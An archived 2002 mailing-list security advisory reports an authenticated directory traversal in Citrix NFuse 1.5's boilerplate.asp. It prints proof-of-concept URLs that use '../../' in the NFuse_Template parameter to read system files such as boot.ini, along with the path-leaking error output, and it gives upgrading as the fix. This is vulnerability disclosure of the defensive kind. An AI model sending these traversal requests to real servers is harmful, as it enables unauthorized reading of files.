Citrix Nfuse directory traversal with boilerplate.asp

From: Eric Budke (budkeat_private)
Date: Wed Mar 27 2002 - 13:26:36 PST

Next message: pokleyzz sakamaniaka: "postnuke v 0.7.0.3 remote command execution"

Previous message: Mario Lorenz: "Re: RCA cable modem Deny of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This vulnerability is based on being an authenticated user (as opposed to a
prior bug someone put out for an unauthenticated users).

Disclaimer:
My ability to find a resource at Citrix via their web site was not
successful, thus the post here. They have been notified thanks to some
contacts forwarded from people on Bugtraq.
Given that you must be authenticated first, one assumes that you have some
minimal level of trust for the end user, so the severity isn't that high.
I don't have access to large numbers of systems on which to check this and
to check across multiple versions. This should be reproducible, no guarantees.

Solution: According to Citrix this issue is only in Nfuse 1.5 as the
boilerplate.asp goes away in the most recent version. Assuming one
upgrades, this and a number of other non-public (from what I can gather
from Citrix) vulnerabilities go away. I don't have the facilities to test
on the latest version, and for all I know something similar can be done
there. Citrix has been notified, their solution was to upgrade.

A command such as:
http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica

Can be replaced with one like this:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/

It seems to work with things in winnt and winnt/system32, it doesn't seem
to like things back on the c:\ which gives up its very minor vuln of the
path of wwwroot.
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories

Gives up:
There was an error:The Citrix HTML template specified does not exist or
could not be accessed. The template file specified was:
c:\inetpub\wwwroot\../../boot.ini
Nice but lacking much use. So it seems we have another directory traversal
issue.

Credits: Professionally I work for Foundstone (www.foundstone.com). This
wouldn't have been found w/o a client engagement through them.

Next message: pokleyzz sakamaniaka: "postnuke v 0.7.0.3 remote command execution"
Previous message: Mario Lorenz: "Re: RCA cable modem Deny of Service"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 28 2002 - 07:23:06 PST